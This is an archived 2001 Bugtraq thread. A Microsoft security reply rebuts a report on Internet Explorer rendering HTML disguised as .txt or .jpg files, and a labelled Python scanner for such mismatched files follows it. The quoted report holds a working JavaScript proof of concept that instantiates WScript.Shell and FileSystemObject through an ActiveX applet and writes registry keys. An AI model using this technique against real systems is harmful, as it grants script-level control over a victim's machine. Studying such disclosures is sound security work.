Hi All -

We investigated this report when we received it on 20 July, and reported our findings to the author. The short answer is that there doesn't appear to be anything new here. However, because the report mixes references to several different issues, it can be difficult to see why this is.

* The Javascript listing below does indeed exploit a vulnerability. However, it's a known vulnerability for which a patch has been available since October 2000. The issue is discussed in Microsoft Security Bulletin MS00-075 (http://www.microsoft.com/technet/security/bulletin/MS00-075.asp).

* If script were included within a .txt, .jpg or other file and hosted on a web site, it could be opened automatically by a page on the site. However, the script would run in the web page's domain, so it would be subject to all the same limitations as script on the page itself. That is, embedding the script within the file wouldn't gain the attacker any capabilities.

* If a user could be convinced to download a .txt, .jpg or other file to the desktop and then open it, either of two effects would result, depending on the file type. Most file types don't open in IE by default. For instance, .txt files open in Notepad by default. In these cases, the script in the file wouldn't run. Other file types, principally image files, do open in IE by default. However, when they're opened from the local machine, they're sent directly to the image rendering engine in IE, bypassing the script parser. Once again, the script wouldn't run.

* Attached files in email are handled the same as downloaded files. So again, either the file would open by default in a program other than IE, or would open in a way that bypasses the script interpreter.

Hope that helps explain the situation.

Regards,

Scott Culp
Security Program Manager
Microsoft Security Response Center

-----Original Message-----
From: cr4zybird [mailto:cr4zybirdat_private]
Sent: Friday, July 27, 2001 3:07 PM
To: bugtraqat_private
Subject: TXT or HTML?
-- IE NEW BUG
TXT or HTML?
-- IE NEW BUG

vulnerable programs:
IE4, IE5, IE5, IE6, Microsoft Word, Microsoft Excel, Microsoft PowerPoint, Tencent explorer
(I've tested all the versions of IE that i can find, they are all vulnerable)

description:
IE doesn't recognize the extensions of files, which may contain some html code. Write a HTML file in NOTEPAD. save it as *.txt. upload to any server. then use IE to visit this page. Found: IE executed the HTML code which is contained in *.txt files. and we can also change the extension, like *.jpg or other non-downloaded files. finally i found that IE can't recognize the extension of a file. using this bug, anyone who knows how to make webpages can successfully attack other people. because of users' generic thought, they think only .html/.htm can be used to attack, but now, even .txt .jpg .png can do everything that a html page can do! even the e-mail attachment! because outlook express is vulnerable, too. treat it seriously please. Due to the company's not wanting to be responsible for this bug, please, take it seriously, and be aware.

here is a source code, just to prove the existence of this new bug.
<SCRIPT Language="JavaScript" type="text/javascript">
<!--
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
  try {
    //ActiveX initialization
    a1=document.applets[0];
    // CLSID of WScript.Shell
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    // CLSID of Scripting.FileSystemObject
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    FSO = a1.GetObject();
    // CLSID of WScript.Network
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();
    try {
      if (document.cookie.indexOf("Chg") == -1) {
        Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "it's a good day to die!");
        Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "it's a good day to die!");
        var expdate = new Date((new Date()).getTime() + (1));
        document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
      }
    } catch(e) {}
  } catch(e) {}
}
function init() {
  setTimeout("f()", 1000);
}
init();
// -->
</SCRIPT>
<img src=http://www.gnu.org/graphics/gnu-head-sm.jpg>

it's a .jpg which may change your IE title (you have to change the extension to *.jpg first)

non-vulnerable programs:
netscape

solutions:
1) download some antivirus software, and update the virus database all the time. and change the name of some 'dangerous' programs in your system, such as format.exe deltree.exe etc. i.e change format.exe to format_0.com etc.
2) try not to visit those so-called 'hacker' or 'cracking' sites. most of the time, you are the victim while you want to learn to attack others.
3) if you have to go visit some site that you are not quite sure is safe, then check it here first: http://crazybird.51.net/look.htm or you can also save the source code of this page to your computer, then save it as *.htm, so you can execute it on your own comp. be aware if it says "the web page contains some unsafe ActiveX" or something like that, then you'd better not execute that ActiveX widget. and i can't promise that it can give you this kind of warning for any aggressive files..
4) DO NOT open your attachment in IE!!!!! don't ever open any type of file in IE directly!!! BE AWARE!! you'd better use antivirus to scan it before you open it after you've downloaded it to your computer.
5) Update the system patch immediately if the patch comes out.

if you still have questions, mail to: cr4zybirdat_private

thanks to: springcream, skywind, nETMONKEY, xiajian, Nancy. they've given me a lot of help on testing and communicating with Microsoft

by: crazybird
cr4zybirdat_private
IRC: irc.sunnet.org 6667 #CNFORCE
26/7/01 China
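The thread above turns on whether a browser or mail client trusts a file's extension or its leading bytes: the report's sample is HTML markup stored under a .txt or .jpg name, and the MSRC reply explains where such a file would and would not be handed to the script parser. The Python script below is an added example, not code from either message: a defender-side check for exactly that content/extension mismatch, of the kind an upload handler or mail gateway could run on incoming files before they reach a sniffing client. The filenames, byte strings and the 512-byte sniff window are constructed for the demonstration.

```python
"""Flag files whose leading bytes carry HTML/script markup although the
filename claims a harmless type (.txt, .jpg, .png, .gif), and image files
whose magic bytes do not match their extension.

Added example; not code from either message in the thread.  All sample
filenames and byte strings are constructed.
"""
import re

# Magic numbers for the image types the report mentions.  A file claiming
# one of these extensions should begin with the matching bytes.
MAGIC = {
    ".jpg":  b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png":  b"\x89PNG\r\n\x1a\n",
    ".gif":  b"GIF8",
}

# Markup that would make a sniffing browser render the bytes as HTML.
# Case-insensitive, applied only to the first SNIFF_WINDOW bytes so a stray
# tag deep inside a legitimate log file does not trigger a hit.
HTML_MARKERS = re.compile(
    rb"<\s*(?:!doctype\s+html|html|head|body|script|iframe|object|applet|embed|img|a\s)",
    re.IGNORECASE,
)
SNIFF_WINDOW = 512  # constructed choice for this example


def looks_like_html(data: bytes) -> bool:
    """True if the leading bytes contain HTML/script markup."""
    return HTML_MARKERS.search(data[:SNIFF_WINDOW]) is not None


def extension_of(filename: str) -> str:
    """Lower-cased final extension including the dot ('' if none)."""
    dot = filename.rfind(".")
    return filename[dot:].lower() if dot != -1 else ""


def classify(filename: str, data: bytes) -> str:
    """Return 'ok', 'html-in-non-html' or 'magic-mismatch'.

    html-in-non-html : a non-HTML extension fronts HTML/script markup
    magic-mismatch   : an image extension whose bytes are not that image
    ok               : nothing suspicious found by this check
    """
    ext = extension_of(filename)
    if ext in (".htm", ".html"):
        return "ok"  # HTML is expected to be HTML
    if looks_like_html(data):
        return "html-in-non-html"
    if ext in MAGIC and not data.startswith(MAGIC[ext]):
        return "magic-mismatch"
    return "ok"


def scan(files: dict) -> dict:
    """Classify every filename -> bytes entry; returns filename -> verdict."""
    return {name: classify(name, data) for name, data in files.items()}


# Constructed sample inputs (not files from the report).
SAMPLES = {
    "notes.txt":  b"Meeting notes for Friday.\nBring the patch list.\n",
    "photo.jpg":  b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32,
    "logo.png":   b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    # A 'text' file that is really a page with a script block.
    "readme.txt": b"<SCRIPT Language=\"JavaScript\">alert(1)</SCRIPT>",
    # A 'jpg' that is really HTML, as in the report's sample.
    "gnu.jpg":    b"<html><body><img src=x></body></html>",
    # A 'png' that is neither PNG nor HTML: still worth a look.
    "odd.png":    b"plain words, wrong extension",
}


if __name__ == "__main__":
    for name, verdict in scan(SAMPLES).items():
        print(f"{name:12s} {verdict}")
```

The check deliberately mirrors how a sniffing client decides: it inspects leading bytes, not the name. Anything classified `html-in-non-html` is a file that a client ignoring extensions would render as a page, which is the condition both messages describe; `magic-mismatch` catches the quieter case of an image name over non-image bytes.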
This archive was generated by hypermail 2b30 : Sun Jul 29 2001 - 20:51:52 PDT